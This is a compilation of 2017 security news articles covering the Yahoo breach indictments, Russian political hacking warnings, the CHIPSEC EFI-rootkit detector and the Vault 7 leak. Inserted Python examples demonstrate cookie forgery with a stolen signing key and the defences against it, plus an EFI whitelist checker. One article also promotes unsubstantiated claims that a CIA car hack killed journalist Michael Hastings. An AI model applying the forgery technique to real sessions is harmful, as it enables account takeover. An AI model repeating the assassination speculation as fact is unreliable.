“The authorities observed a large spike in suspicious activity on a major U.S. cellular carrier that has raised red flags in the Department of Homeland Security and prompted concerns that cellphones in the region are being tracked,” reads the article published by the Free Beacon. “Such activity could allow pernicious actors to clone devices and other mobile equipment used by civilians and government insiders, according to information obtained by the Free Beacon.”

According to the Free Beacon, the attackers gained unlawful access to several cell towers in the area and siphoned a large amount of subscriber location data from a U.S. cellular carrier.


The activity was spotted by a program known as ESD Overwatch, which monitors cell tower activity for anomalies; the program is backed by DHS and ESD America.

According to a report prepared by ESD Overwatch, a contractor working on behalf of DHS, the program's data shows that the U.S. cell carrier has experienced “unlawful access to their network for the purpose of large scale subscriber tracking.”

“Cell phone information gathered by the program shows major anomalies in the D.C.-area indicating that a third-party is tracking en-masse a large number of cellphones. Such a tactic could be used to clone phones, introduce malware to facilitate spying, and track government phones being used by officials in the area,” continues the Free Beacon.

“The attack was first seen in D.C. but was later seen on other sensors across the USA,” according to one source familiar with the situation. “A sensor located close to the White House and another over near the Pentagon have been part of those that have seen this tracking.”

The threat actor is trying to identify and track cellphones as they connect to cell towers. The DHS’s Office of Public Affairs confirmed that the ESD Overwatch program was used in a 90-day pilot program that began Jan. 18.

There is another disconcerting aspect of the story: is this the first time a threat actor has run such a surveillance campaign?

There is no answer to that question. According to the Free Beacon, “before the [ESD Overwatch program] surveillance program was initiated the federal government did not have a method to detect intrusions of the nature seen over the past several months.”

An official with ESD Overwatch confirmed the existence of the DHS program.

The surveillance of US cellular communications has become a top concern in Congress; on Wednesday, lawmakers asked DHS for information on the countermeasures in place to prevent foreign threat actors from spying on communications.


Two Russian former FSB agents and two hackers indicted for 2014 Yahoo data breach
16.3.2017 securityaffairs BigBrothers

The US authorities have charged two former Russian FSB agents and two hackers over the 2014 Yahoo data breach that exposed 500 million Yahoo accounts.
Last year Yahoo disclosed the 2014 breach, which compromised over 500 million user accounts.

At the time of the disclosure, company representatives added that their security experts suspected the involvement of a nation-state actor.

“We have confirmed that a copy of certain user account information was stolen from the company’s network in late 2014 by what it believes is a state-sponsored actor. The account information may have included names, email addresses, telephone numbers, dates of birth, hashed passwords (the vast majority with bcrypt) and, in some cases, encrypted or unencrypted security questions and answers.” reads the security notice issued by Yahoo.

“The ongoing investigation suggests that stolen information did not include unprotected passwords, payment card data, or bank account information; payment card data and bank account information are not stored in the system that the investigation has found to be affected. Based on the ongoing investigation, Yahoo believes that information associated with at least 500 million user accounts was stolen and the investigation has found no evidence that the state-sponsored actor is currently in Yahoo’s network. Yahoo is working closely with law enforcement on this matter.”

The US authorities have charged two Russian intelligence officers and two criminal hackers with taking part in the 2014 Yahoo hack.

The four defendants are:

Dmitry Aleksandrovich Dokuchaev, 33 — an officer in the FSB Center for Information Security at the time of the hack, and a Russian national and resident.
Igor Anatolyevich Sushchin, 43 — an FSB officer, a superior to Dokuchaev within the FSB, and Russian national and resident.
Alexsey Alexseyevich Belan, aka “Magg,” 29 — a Russian national and resident, who has been on the FBI’s Most Wanted Hackers list.
Karim Baratov, aka “Kay,” “Karim Taloverov” and “Karim Akehmet Tokbergenov,” 22 — a Canadian and Kazakh national and a resident of Canada.
The members of the group are charged with:

Conspiring to commit computer fraud and abuse
Conspiring to engage in and the theft of trade secrets
Conspiring to engage in and committing economic espionage
Conspiring to commit wire fraud
Counterfeit access device fraud
Counterfeit access device making equipment
Aggravated identity theft
Transmitting code with the intent to cause damage to computers
Unauthorized access to a computer for obtaining information for commercial advantage and private financial gain
“A grand jury in the Northern District of California has indicted four defendants, including two officers of the Russian Federal Security Service (FSB), for computer hacking, economic espionage and other criminal offenses in connection with a conspiracy, beginning in January 2014, to access Yahoo’s network and the contents of webmail accounts.” the Department of Justice announced yesterday.

According to the prosecutors, the hackers accessed at least 30 million accounts to harvest contacts for a spam campaign, and read the email contents of thousands of targeted people.


According to the indictment, Belan downloaded the Yahoo database, an archive containing usernames, recovery e-mail accounts, phone numbers as well as “certain information required to manually create, or “mint,” account authentication web browser “cookies” for more than 500 million Yahoo accounts.”
With this information in hand, the hackers gained unauthorized access to the contents of accounts at other webmail providers, including Google. Russian and American officials, Russian journalists, and employees of financial services and other businesses were the gang's preferred targets.

The United States has asked Russia to hand over the three suspects residing there, but that is unlikely given the absence of an extradition treaty with Russia. Let’s close with a note on the hackers: according to Acting Assistant Attorney General Mary McCord, they were not involved in the DNC hack.


U.S. Government Indicts Two Russian FSB Officers Over Yahoo Hack

15.3.2017 securityweek BigBrothers
U.S. Government Indicts Four Over 2014 Yahoo Hack, Including Two Russian FSB Officers

The US government today announced the indictment of four individuals charged with computer hacking, economic espionage and other offenses in connection with the 2014 breach of Yahoo that involved the theft of information on at least 500 million user accounts. Three of the accused are Russian nationals currently living in Russia. The fourth, Karim Baratov, is a Canadian and Kazakh national who was arrested in Canada on Tuesday.

Two of the Russian nationals, Dmitry Aleksandrovich Dokuchaev and Igor Anatolyevich Sushchin are serving officers of the Russian Federal Security Service (FSB). In announcing the indictments, Acting Assistant Attorney General Mary McCord of the National Security Division made it clear that the US believes they were acting in their capacity as FSB officers.

The third Russian national is Alexsey Alexseyevich Belan. This is not the first time he has been indicted by the US. He was indicted on different charges in 2012 and 2013, and is on the FBI's 'Cyber Most Wanted' List. He is currently the subject of an Interpol Red Notice. He was arrested in a European country in June 2013, but managed to escape to Russia before he could be extradited to the US.

The DOJ believes the FSB officers employed cyber criminals (Belan and Baratov) to do the hacking, and suspects that the FSB's primary objective was espionage. Targets included the private accounts of Russian journalists; Russian and U.S. government officials; and employees of a prominent Russian cybersecurity company. The two non-FSB cyber criminals then used the stolen data for more traditional criminal activities.

"We've known for some time that spies have targeted email accounts as a primary vector to collect information," comments Eric O'Neill, a former FBI counter-terrorism operative who helped capture Russian spy Robert Hanssen -- and now national security strategist with Carbon Black. "Global communications, both personal and business, often rely on email as the first method of communication. This creates a detailed record that can be used for a variety of purposes. Infiltration into email accounts allows spies to collect credentials that provide access to targeted systems. Monitoring government agency systems informs policy decisions, collects information on defense and attack capability, and can provide an economic boost to foreign nations."

Belan also obtained access to Yahoo's Account Management Tool. Used in conjunction with the stolen account database, he and the FSB officers were able to locate Yahoo email accounts of interest and manually create cookies to allow unauthorized access to at least 6,500 accounts.

In a separate statement today, Yahoo commented, "the U.S. Department of Justice announced the indictment of four defendants, two Russian intelligence officers and two state-sponsored hackers, for the theft of Yahoo user data in late 2014, as well as cookie forging to obtain access to user accounts on our network in 2015 and 2016." Yahoo has always maintained its original position that the hack had been state-sponsored, and it is now vindicated.

"We appreciate the FBI's diligent investigative work and the DOJ’s decisive action to bring to justice those responsible for the crimes against Yahoo and its users." For its part, the government acknowledged the help of both Yahoo and Google in its investigations, and also acknowledged help from the Canadian authorities and the UK's MI5.

The US hopes, and (officially) expects, the three Russians to be turned over to the US for trial. "We would hope they would respect our criminal justice system, and respect these charges, and what they need to do," said McCord.

The reality is there is no extradition treaty with Russia, and this is unlikely to happen. Russia has already ignored two requests on Belan, and a third is expected to be issued tomorrow.

"Instead of detaining him [Belan, under the Red Notice] the FSB officers used him to break into Yahoo's networks. Meanwhile, Belan used his relationship with the two FSB officers and his access to Yahoo to commit additional crimes to line his pockets with money," said McCord.

Belan used his access to steal financial information such as gift card and credit card numbers from webmail accounts; to gain access to more than 30 million accounts whose contacts were then stolen to facilitate a spam campaign; and to earn commissions from fraudulently redirecting a subset of Yahoo’s search engine traffic.

The indictment of two Russian security officers will undoubtedly put further pressure on already strained US/Russian relations.

Asked if it would be possible to maintain a good working relationship with the FSB following these indictments, McCord replied, "I think that is a challenge. It is something we will continue to look at. I think this case is going to be a great test of that."

"Any indictment of Russia by the US DOJ will likely be met with recrimination and denial," adds O'Neill. "Russia will likely use the same playbook that China used when we charged five Chinese military spies for cyber espionage against U.S. corporations and a labor organization in 2014... China vehemently denounced the indictment and stated that the US used 'fabricated facts' and that it 'grossly violates the basic norms governing international relations and jeopardizes China-U.S. cooperation'."

“These accounts contain a tremendous amount of personal information, including personally identifiable information, financial account passwords, workplace account passwords, information about investments and financial issues, or details around the workplace projects and business plans of CEOs, attorneys, and high net worth investors, as well as politicians, military officers, or other government officials,” Steve Grobman, Intel Security’s CTO, told SecurityWeek.

“The public disclosure of such material could be sensitive enough to destroy careers, enable blackmail, endanger a mission, or influence high-level negotiations and decisions. The weaponization of such information in the realm of economic espionage presents unlimited opportunities for monetization," Grobman added.


US Charges Two Russian Spies & Two Hackers For Hacking 500 Million Yahoo Accounts
15.3.2017 thehackernews BigBrothers

The 2014 Yahoo hack, disclosed late last year, compromised over 500 million Yahoo user accounts and was believed to have been carried out by a state-sponsored hacking group.
Now, two Russian intelligence officers and two criminal hackers have been charged by the US government in connection with the 2014 Yahoo hack that compromised about 500 million Yahoo user accounts, the Department of Justice announced Wednesday.
According to the prosecutors, at least 30 million accounts were accessed to harvest contacts for a spam campaign, and the email contents of thousands of people were read, including journalists, government officials, and technology company employees.
The four defendants — two officers from the Russian Federal Security Service (FSB) and two other hackers — are identified as:
Dmitry Aleksandrovich Dokuchaev, 33 — an officer in the FSB Center for Information Security at the time of the hack, and a Russian national and resident.
Igor Anatolyevich Sushchin, 43 — an FSB officer, a superior to Dokuchaev within the FSB, and Russian national and resident.
Alexsey Alexseyevich Belan, aka "Magg," 29 — a Russian national and resident, who has been on the FBI’s Most Wanted Hackers list and indicted twice in 2012 and 2013 by U.S. Federal grand juries for hacking and fraud charges.
Karim Baratov, aka "Kay," "Karim Taloverov" and "Karim Akehmet Tokbergenov," 22 — a Canadian and Kazakh national and a resident of Canada.
In a 38-page indictment [PDF] unsealed Wednesday, the prosecutors said the two Russian spies worked with the two other hackers, who broke into Yahoo's network and gained initial access in early 2014.
Belan, who is on the FBI's most-wanted cybercriminals list, used the file transfer protocol (FTP) to download the Yahoo database, containing usernames, recovery e-mail accounts, phone numbers as well as "certain information required to manually create, or "mint," account authentication web browser “cookies” for more than 500 million Yahoo accounts."
The spies then used the stolen information to obtain unauthorized access to the contents of accounts at Yahoo, Google and other webmail providers, including those of Russian and American officials, Russian journalists, employees of financial services and other businesses.
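The cookie "minting" described here, and in the two Yahoo write-ups above, works because a session cookie in many deployments is just a payload plus a keyed MAC: whoever holds the server's signing secret can produce a cookie for any account without ever knowing a password. The Python below is an added example, not Yahoo's code or the real format of Yahoo's cookies. It uses a hypothetical HMAC-SHA256 cookie scheme with constructed keys and account names to show the forgery itself, why editing a minted cookie still fails, and the two server-side measures that actually invalidate minted cookies: rotating the signing key and setting a per-account "not before" timestamp.

```python
"""Added example (not Yahoo's code or cookie format): why a stolen
cookie-signing secret lets an attacker 'mint' valid session cookies for
arbitrary accounts, and what invalidates them. The HMAC scheme, key
values and account names below are constructed for illustration."""
import base64
import binascii
import hashlib
import hmac
import json
from typing import Dict, Iterable, Optional


def _b64e(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def _b64d(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def mint_cookie(key: bytes, user: str, issued_at: int, ttl: int = 3600) -> str:
    """Produce '<payload>.<tag>'. Nothing here needs the user's password:
    whoever holds `key` (the server, or an attacker who exfiltrated it)
    can mint a cookie for any account."""
    payload = json.dumps(
        {"u": user, "iat": issued_at, "exp": issued_at + ttl},
        separators=(",", ":"), sort_keys=True,
    ).encode()
    tag = hmac.new(key, payload, hashlib.sha256).digest()
    return f"{_b64e(payload)}.{_b64e(tag)}"


def verify_cookie(
    keys: Iterable[bytes],
    cookie: str,
    now: int,
    not_before: Optional[Dict[str, int]] = None,
) -> Optional[str]:
    """Return the account name if the cookie is valid, else None.

    `keys` lists every signing key still accepted (rotation = drop the old one).
    `not_before` maps account -> earliest acceptable issue time; raising it for
    an account (after a password reset, or once forged cookies are discovered)
    invalidates every cookie minted for that account before that moment."""
    not_before = not_before or {}
    try:
        payload_b64, tag_b64 = cookie.split(".", 1)
        payload, tag = _b64d(payload_b64), _b64d(tag_b64)
    except (ValueError, binascii.Error):
        return None
    for key in keys:
        expected = hmac.new(key, payload, hashlib.sha256).digest()
        if not hmac.compare_digest(expected, tag):
            continue  # wrong key or tampered payload; try the next accepted key
        try:
            data = json.loads(payload)
            user, iat, exp = str(data["u"]), int(data["iat"]), int(data["exp"])
        except (ValueError, KeyError, TypeError):
            return None
        if exp <= now or iat < not_before.get(user, 0):
            return None
        return user
    return None


def demo(now: int = 1_500_000_000) -> Dict[str, Optional[str]]:
    """Forge a cookie with a stolen key, then show what does and does not stop it."""
    server_key = b"constructed-server-signing-key"   # assumed stolen along with the user DB
    rotated_key = b"constructed-key-after-rotation"
    target = "target@example.com"                      # constructed account name

    forged = mint_cookie(server_key, target, now)      # attacker never needed a password

    # Re-use the forged tag over a payload naming a different account.
    tag_b64 = forged.split(".", 1)[1]
    other_payload = json.dumps({"u": "admin@example.com", "iat": now, "exp": now + 3600},
                               separators=(",", ":"), sort_keys=True).encode()
    tampered = f"{_b64e(other_payload)}.{tag_b64}"

    return {
        "forged_accepted": verify_cookie([server_key], forged, now),      # the attack works
        "tampered_payload": verify_cookie([server_key], tampered, now),   # the MAC catches edits
        "expired": verify_cookie([server_key], forged, now + 4000),
        "after_key_rotation": verify_cookie([rotated_key], forged, now),
        "after_account_revocation": verify_cookie([server_key], forged, now, {target: now + 1}),
    }
```

demo() returns the forged cookie accepted under the stolen key and rejected in every other case. The point for defenders: a minted cookie verifies perfectly, so neither logging nor the MAC itself will flag it; once signing material is known to be stolen, the remedies are key rotation and per-account revocation, which is why "invalidating forged cookies" is a server-side operation rather than something users can do by changing passwords.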
The range of charges are officially listed as:
Conspiring to commit computer fraud and abuse
Conspiring to engage in and the theft of trade secrets
Conspiring to engage in and committing economic espionage
Conspiring to commit wire fraud
Counterfeit access device fraud
Counterfeit access device making equipment
Aggravated identity theft
Transmitting code with the intent to cause damage to computers
Unauthorized access to a computer for obtaining information for commercial advantage and private financial gain
Baratov was arrested on Tuesday by the Toronto Police Department, while Belan and the two FSB officers are in Russia. The United States has requested that all three be handed over to face charges, but the US has no extradition treaty with Russia.
Meanwhile, Assistant Attorney General Mary McCord said that there was no connection between the Wednesday indictment and the investigation into the hacking of the Democratic National Committee (DNC) last year.
The news of the arrest came a few weeks after Yahoo and Verizon Communications Inc. agreed to reduce the price of the upcoming acquisition deal by $350 Million in the wake of the two data breaches.
The deal, previously finalized at $4.8 Billion, is now valued at about $4.48 Billion in cash and is expected to close in the second quarter.


UK NCSC warns of cyber attacks powered by Russia against the political system
14.3.2017 securityaffairs BigBrothers

The UK National Cyber Security Centre (NCSC) is warning of Russian political hacking capabilities; it considers the risk of cyber attacks against the political system to be high.
The alert was raised by the NCSC, which has written to political parties in the UK to warn about “the potential for hostile action against the UK political system.”

The warning doesn’t explicitly name Russia as the main threat, but the intelligence community has no doubt about the capabilities of Russian state-sponsored hackers.

In a separate context, British Foreign Secretary Boris Johnson explained that there is no evidence of cyber attacks by Russian entities against British politicians and parties.

“We have no evidence the Russians are actually involved in trying to undermine our democratic processes at the moment. We don’t actually have that evidence. But what we do have is plenty of evidence that the Russians are capable of doing that,” Johnson declared on national television Sunday. He also referred to the cyber attack against the French broadcaster TV5Monde and the diversionary strategy adopted by the Russian hackers behind it.

“There is no doubt that they have been up to all sorts of dirty tricks – bringing down French TV stations; you have seen what happened in the United States where there is no question at all they were involved in the hacking of the Democratic National Convention.”

Last year, the US government accused Russia of cyber attacks against American political organizations; the Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI) published a Joint Analysis Report (JAR) with information about the tools, infrastructure and TTPs used by the Russian civilian and military intelligence services (RIS) against the United States election.

The U.S. Government linked the activity to a Russian threat actor designated GRIZZLY STEPPE. It was the first time a JAR attributed malicious cyber activity to a specific country or threat actor.

The fear of possible attacks powered by Russian hackers is shared among multiple European Governments.

In January, French Defense Minister Le Drian expressed concern about cyber attacks against defense systems and warned of hacking campaigns against the upcoming elections.

The Minister warned of possible cyber attacks like the ones that targeted the 2016 US Presidential Election.

In France, the conservative candidate Francois Fillon has been praised by Russian president Vladimir Putin for his intention to strengthen the relationship with the Kremlin. On the other side, the candidate Emmanuel Macron is in open opposition to Russia, and for this reason experts believe that hackers could target him and his party.

Relations between Russia and France have been strained by President Hollande's position on the dispute between Russia and Ukraine during the 2014 Crimea crisis.

President Hollande also blamed Russia for war crimes over its bombardment of the Syrian city of Aleppo.

The Minister is overseeing an overhaul of his government's cyber-security operations.

In November 2016, the German government expressed concern about possible interference by Russian nation-state hackers in the 2017 German election.


German politicians fear the Kremlin’s cyber capabilities. The alleged Russian interference in the US presidential election is unleashing a domino effect and spreading fear among governments.

“I don’t have any concrete information about the origin of the attacks on the Telekom network,” Chancellor Angela Merkel said on Tuesday in Berlin. “Let me just say that such cyberattacks, or ‘hybrid attacks’ as they’re known in Russian doctrine, are part of everyday life today, and we need to learn to deal with them.”

Germany’s Interior Minister Thomas de Maizière was cautious about explicitly blaming Moscow.

“It’s possible that we can’t clearly distinguish between criminal activities launched from a certain country and state activities,” de Maizière said at a conference of federal state interior ministers in Saarbrücken, when asked if Moscow was responsible for the attacks against the German routers.

The new president of German intelligence service (BND), Bruno Kahl, confirmed that foreign hackers can try to launch cyber attacks in the attempt to “delegitimize the democratic process” in the country.

“In an interview with the Süddeutsche Zeitung newspaper, Bruno Kahl – the new president of German intelligence service, the BND – complained about hackers trying to “delegitimize the democratic process as such” and said he had “indications” that the hacks “came from certain quarters,” namely Russia. And the Telekom hack is by no means the only attack of its kind in Germany.” reported DW.com.

Back to the NCSC warning: in a letter to the British political parties, NCSC chief executive Ciaran Martin urged them to stay alert to cyber attacks on their infrastructure aimed at subverting democratic processes in the country.

“You will be aware of the coverage of events in the United States, Germany and elsewhere reminding us of the potential for hostile action against the UK political system. This is not just about the network security of political parties’ own systems. Attacks against our democratic processes go beyond this and can include attacks on parliament, constituency offices, thinktanks and pressure groups and individuals’ email accounts.” Martin wrote in the letter.

“Protecting the UK’s political system from hostile cyber-activity is one of our operational priorities, so we have signposted parties to existing guidance and will deliver tailored seminars on cyber-security measures. The seminars will build on our existing advice and will provide an overview of threats, case studies on recent cyber-incidents, practical steps to reduce the risk and advice on incident management.”


UK Intelligence Agency Warns of Russian Political Hacking Capabilities

13.3.2017 securityweek BigBrothers

The UK's National Cyber Security Center (NCSC, part of GCHQ) has written to the British political parties to warn about "the potential for hostile action against the UK political system." Without confirming that the main threat is from Russia, the letter makes it clear that the primary threat is considered to be that country.

In a similar vein, the British Foreign Secretary Boris Johnson said on national television Sunday, "We have no evidence the Russians are actually involved in trying to undermine our democratic processes at the moment. We don’t actually have that evidence. But what we do have is plenty of evidence that the Russians are capable of doing that."

He added, "There is no doubt that they have been up to all sorts of dirty tricks – bringing down French TV stations; you have seen what happened in the United States where there is no question at all they were involved in the hacking of the Democratic National Convention."

In October 2016, the US government accused Russia of being behind cyberattacks against American political organizations. In December 2016, Germany accused Russia of waging hybrid political warfare. "Such cyber-attacks, or hybrid conflicts as they are known in Russian doctrine, are now part of daily life and we must learn to cope with them," said Chancellor Angela Merkel. Earlier this month the French government abandoned plans for expatriate electronic voting in the April/May presidential election after the National Cybersecurity Agency warned of an "extremely high risk" of cyberattacks.

In his letter to the British political parties, NCSC chief executive Ciaran Martin wrote, "You will be aware of the coverage of events in the United States, Germany and elsewhere reminding us of the potential for hostile action against the UK political system. This is not just about the network security of political parties' own systems. Attacks against our democratic processes go beyond this and can include attacks on parliament, constituency offices, thinktanks and pressure groups and individuals' email accounts."

In a separate statement, he explained, "Protecting the UK’s political system from hostile cyber-activity is one of our operational priorities, so we have signposted parties to existing guidance and will deliver tailored seminars on cyber-security measures. The seminars will build on our existing advice and will provide an overview of threats, case studies on recent cyber-incidents, practical steps to reduce the risk and advice on incident management."


CHIPSEC: Intel Security releases detection tool for CIA EFI rootkits
13.3.2017 securityaffairs BigBrothers

After the CIA leak, Intel Security has released a module for its CHIPSEC framework that detects rogue EFI binaries inside a computer's firmware.
A few days ago, WikiLeaks announced that it is working with software makers to fix the zero-day flaws in the Vault7 dump that affect their products and services. The organization is sharing information on the hacking tools included in the dump with them, and IT vendors are already working on fixes.
In response to the CIA data leak, Intel Security has released a tool that allows users to check whether the firmware of their computers has been modified to contain unauthorized code.

Digging into the CIA archive, experts discovered that the Agency's hackers developed EFI (Extensible Firmware Interface) rootkits for Apple's MacBooks.

Developers at the CIA Embedded Development Branch (EDB) group have designed an OS X “implant” called DerStarke that implements a kernel code injection mechanism in a module dubbed Bokor and uses an EFI persistence module called Dark Matter.

UEFI (Unified EFI) replaces the legacy BIOS in modern computers: it is the low-level firmware that runs before the operating system during the boot process to initialize the hardware.

UEFI firmware is composed of a large number of "applications" (drivers and modules) that implement the different features of a modern platform.

Malware running stealthily in the EFI executes before the operating system and can therefore bypass security mechanisms enforced by the OS and inject malicious code into the OS kernel. It also gains persistence on the infected machine, allowing the rootkit to survive reboots, system updates and even re-installation of the OS: an implant stored in the firmware flash survives re-imaging of the disk, while one stored on the EFI system partition survives as long as that partition is not wiped.

Reading the documents, it is possible to discover another project developed by the CIA EDB, code-named QuarkMatter, a “Mac OS X EFI implant, which uses an EFI driver stored on the EFI system partition to provide persistence to an arbitrary kernel implant.”

Now the Advanced Threat Research team at Intel Security has designed a new module for its existing CHIPSEC open-source framework that is able to detect malicious EFI binaries.

“CHIPSEC is a framework for analyzing the security of PC platforms including hardware, system firmware (BIOS/UEFI), and platform components. It includes a security test suite, tools for accessing various low-level interfaces, and forensic capabilities,” reads the description of the framework. “It can be run on Windows, Linux, Mac OS X and UEFI shell. Instructions for installing and using CHIPSEC can be found in the manual (chipsec-manual.pdf).”

CHIPSEC is a collection of command-line tools that use low-level interfaces to analyze a system’s hardware, firmware, and platform components.

The new module lets the user take a clean EFI image from the manufacturer, extract its contents and build a whitelist of the binaries it contains. CHIPSEC can then compare that whitelist against the binaries that make up the system’s current EFI firmware, or against an EFI image previously extracted from a system; any binary that is not on the list, or whose hash no longer matches, is flagged for inspection.
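The whitelist-and-compare workflow described above, as an added Python example: this is illustrative code written for this page, not CHIPSEC's own module. It takes an extracted firmware tree, builds a JSON whitelist keyed by relative path with a SHA-256 per module, and then reports which modules were added, modified or removed in a second extraction, which is what an incident responder needs to spot an EFI implant of the kind described in the leak. The directory layout, the module names under FV_MAIN/ and their byte contents are constructed for the demo. Upstream, CHIPSEC ships this logic as the tools.uefi.whitelist module and works on the raw firmware image and the GUIDs of the modules it contains; consult chipsec-manual.pdf for the exact invocation.

```python
"""Whitelist-and-compare check for modules extracted from EFI firmware.

Added example for this page: it mirrors the workflow of the CHIPSEC module
described above but is not CHIPSEC's own code. The directory layout, the
module names under FV_MAIN/ and their byte contents are constructed for the
demo and stand in for a real firmware extraction.
"""
import hashlib
import json
import tempfile
from pathlib import Path


def sha256_file(path: Path) -> str:
    """Hash one extracted module in 64 KiB chunks (firmware volumes can be large)."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_whitelist(extracted_root: str) -> dict:
    """Map every file under an extracted firmware tree to its SHA-256.

    Keys are POSIX-style paths relative to the root so that a whitelist built
    from the vendor image compares cleanly against any later extraction.
    """
    root = Path(extracted_root)
    return {
        p.relative_to(root).as_posix(): sha256_file(p)
        for p in sorted(root.rglob("*"))
        if p.is_file()
    }


def save_whitelist(whitelist: dict, path: Path) -> None:
    path.write_text(json.dumps(whitelist, indent=2, sort_keys=True))


def load_whitelist(path: Path) -> dict:
    return json.loads(path.read_text())


def check_against_whitelist(whitelist: dict, extracted_root: str) -> dict:
    """Compare a (possibly infected) extraction with the clean whitelist.

    Reports the three findings a responder cares about: modules that were not
    in the vendor image (the usual shape of an implant), modules whose hash
    changed (a patched driver) and modules that disappeared (a driver that was
    replaced or stripped to make room).
    """
    current = build_whitelist(extracted_root)
    added = sorted(set(current) - set(whitelist))
    missing = sorted(set(whitelist) - set(current))
    modified = sorted(
        name for name in whitelist.keys() & current.keys()
        if whitelist[name] != current[name]
    )
    return {
        "added": added,
        "modified": modified,
        "missing": missing,
        "clean": not (added or modified or missing),
    }


# Constructed sample trees: the byte strings are placeholders, not real EFI
# PE/COFF modules. The "suspect" tree carries one patched driver and one
# module that does not exist in the vendor image.
CLEAN_IMAGE = {
    "FV_MAIN/SecCore.efi": b"MZ clean SecCore",
    "FV_MAIN/PeiCore.efi": b"MZ clean PeiCore",
    "FV_MAIN/DxeCore.efi": b"MZ clean DxeCore",
    "FV_MAIN/UsbDriver.efi": b"MZ clean UsbDriver",
}
SUSPECT_IMAGE = {
    "FV_MAIN/SecCore.efi": b"MZ clean SecCore",
    "FV_MAIN/PeiCore.efi": b"MZ clean PeiCore",
    "FV_MAIN/DxeCore.efi": b"MZ clean DxeCore",
    "FV_MAIN/UsbDriver.efi": b"MZ patched UsbDriver",      # hash no longer matches
    "FV_MAIN/UnknownDriver.efi": b"MZ not in vendor image",  # hypothetical implant
}


def _write_tree(root: Path, files: dict) -> None:
    for rel, data in files.items():
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_bytes(data)


def run_demo(suspect_image: dict = SUSPECT_IMAGE) -> dict:
    """Build the whitelist once from the clean image, persist it as JSON as you
    would per firmware version, then check a second extraction against it."""
    with tempfile.TemporaryDirectory() as tmp:
        clean, suspect = Path(tmp) / "clean", Path(tmp) / "suspect"
        _write_tree(clean, CLEAN_IMAGE)
        _write_tree(suspect, suspect_image)
        whitelist_path = Path(tmp) / "efilist.json"
        save_whitelist(build_whitelist(str(clean)), whitelist_path)
        return check_against_whitelist(load_whitelist(whitelist_path), str(suspect))


if __name__ == "__main__":
    print(json.dumps(run_demo(), indent=2))
```

Two caveats a practitioner would want: the whitelist is only meaningful for the exact firmware version it was generated from, so it has to be regenerated after every vendor firmware update, and a dump taken from inside a running OS is produced by software that a firmware implant may already control. For high-assurance cases, read the SPI flash with an external programmer and compare that image instead.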


Michael Hastings crash, incident or assassination? New doubts after Wikileaks Vault 7 leak
13.3.2017 securityaffairs BigBrothers

Was Michael Hastings a victim of the CIA's hacking tools? The WikiLeaks Vault 7 data leak reveals the Agency's interest in car hacking.
This is the story of the mysterious death of Michael Hastings, an American journalist, who rose to prominence with his coverage of the Iraq War for Newsweek in the 2000s.

To better understand the figure, remember that Hastings was one of the most vocal critics of the Obama administration and its interference with US journalism. He referred to the administration's restrictions on freedom of the press as a “war” on journalism.

His last work, “Why Democrats Love to Spy On Americans“, was published by BuzzFeed on June 7, 2013. Hastings died in a fiery high-speed automobile crash on June 18, 2013, in Los Angeles, California.


When the well-known hackers Charlie Miller and Chris Valasek demonstrated that it is possible to hack a connected car remotely, many experts and journalists started speculating that the Hastings crash had been caused by US intelligence using some special tool to remotely control the vehicle. Sci-fi? Yet another conspiracy theory?

Last week WikiLeaks released “Vault 7,” a huge trove of CIA files that provides detailed information on the hacking capabilities of the US Central Intelligence Agency, including a reported interest in remotely hijacking vehicles, which WikiLeaks suggested could be used to conduct “undetectable assassinations.”

Curiously, according to San Diego 6 News, Hastings had been investigating CIA Director John Brennan prior to the incident; he had also contacted WikiLeaks lawyer Jennifer Robinson just a few hours before he died, saying that the feds were investigating his work.

Perhaps just coincidences, but some details of the crash itself raised suspicion among journalists.

“Several details regarding the crash itself also suggested the possibility that Hastings’ death was the result of foul play, despite official statements to the contrary. For instance, the car caused no damage to the median curb dividing the four-lane road where the crash occurred, nor were there any skid marks present – despite the fact that the car made a sudden 60-degree turn into a palm tree.” reported Mintpressnews.com.

There is another strange detail: a worker at a business near the crash site who witnessed the incident told San Diego 6 News that the car was traveling too fast and that he heard explosions from within the vehicle shortly before the deadly impact.

Police said the fire inside the car was too intense for this kind of crash, and the coroner had serious difficulties analyzing Hastings’ body.

The car was never analyzed by independent experts, despite public rumors of foul play.

The former U.S. National Coordinator for Security, Infrastructure Protection and Counterterrorism Richard A. Clarke, told the Huffington Post that the crash that killed Hastings was “consistent with a car cyber attack.”

“What has been revealed as a result of some research at universities is that it’s relatively easy to hack your way into the control system of a car, and to do such things as cause acceleration when the driver doesn’t want acceleration, to throw on the brakes when the driver doesn’t want the brakes on, to launch an air bag,” Clarke told The Huffington Post. “You can do some really highly destructive things now, through hacking a car, and it’s not that hard.”

“So if there were a cyber attack on the car — and I’m not saying there was,” Clarke added, “I think whoever did it would probably get away with it.”

“I’m not a conspiracy guy. In fact, I’ve spent most of my life knocking down conspiracy theories,” said Clarke, who ran afoul of the second Bush administration when he criticized the decision to invade Iraq after 9/11. “But my rule has always been you don’t knock down a conspiracy theory until you can prove it [wrong]. And in the case of Michael Hastings, what evidence is available publicly is consistent with a car cyber attack. And the problem with that is you can’t prove it.”

Back to the present: the documents shared by WikiLeaks show that the CIA studied the possibility of infecting the vehicle control systems used by modern cars and trucks. According to WikiLeaks, such malicious code would permit the CIA to engage in nearly undetectable assassinations.

“While the Wikileaks documents confirm that this technology existed in 2014, there is reason to believe that the CIA was capable of hacking vehicles as far back as the late 1990s. Gordon Duff, senior editor of Veterans Today, wrote in 2010 about what he termed the CIA’s “Boston Brakes” assassination technique.” continues the Mintpressnews.

“In the article, Duff noted that the deaths of Chilcot Inquiry witness Richard Waddington, anti-Zionist Austrian politicians Jorg Haider and even Princess Diana all involved car crashes where the vehicle crashed into objects like concrete abutments but left no skid marks – not unlike the Hastings crash.”

According to a story published by WhoWhatWhy in 2013, Michael Hastings was investigating the CIA's use of weaponized malware and surveillance tools.


WikiLeaks is working with software makers on Zero-Days included in the Vault7 dump
11.3.2017 securityaffairs BigBrothers

WikiLeaks has announced that it is working with software makers on the zero-days by sharing information on the hacking tools included in the Vault7 dump with them.
WikiLeaks announced on Tuesday that it has obtained thousands of files allegedly originating from a high-security network of the U.S. Central Intelligence Agency (CIA).

